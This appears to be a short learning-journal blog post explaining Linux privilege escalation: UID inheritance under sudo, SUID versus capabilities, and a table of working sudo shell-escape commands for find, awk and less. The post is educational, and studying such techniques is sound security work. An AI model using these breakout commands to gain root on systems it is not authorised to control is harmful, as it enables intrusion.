π οΈ The Auditor's Technical Breakdown
1. Privilege Inheritance: The "Parent-Child" Rule
When a process starts a new program, that program usually inherits the same user ID (UID).
-
The Exploit: If you run
sudo less /etc/passwd, thelessprocess is owned byroot. If you escape to a shell from insideless(using!/bin/sh), that shell is now a Root Shell.
2. SUID vs. Linux Capabilities
I practiced distinguishing between these two privilege delegation methods:
-
SUID (
-rwsr-xr-x): The binary runs as the owner (root) immediately. -
Capabilities (
cap_setuid+ep): The binary starts as a normal user but has the "special power" to change its own UID to root (often exploited via Python'sos.setuid(0)).
3. Common Binary "Breakouts" (GTFOBins Style)
I audited how everyday tools can be turned into escalation vectors if found in sudo -l:
| Binary | Method | Exploit Command |
|---|---|---|
| find |
-exec feature |
sudo find . -exec /bin/sh \; -quit |
| awk |
system() call |
sudo awk 'BEGIN {system("/bin/sh")}' |
| less |
! shell escape |
sudo less /etc/passwd -> then !/bin/sh
|
Follow my journey: #1HourADayJourney
Top comments (0)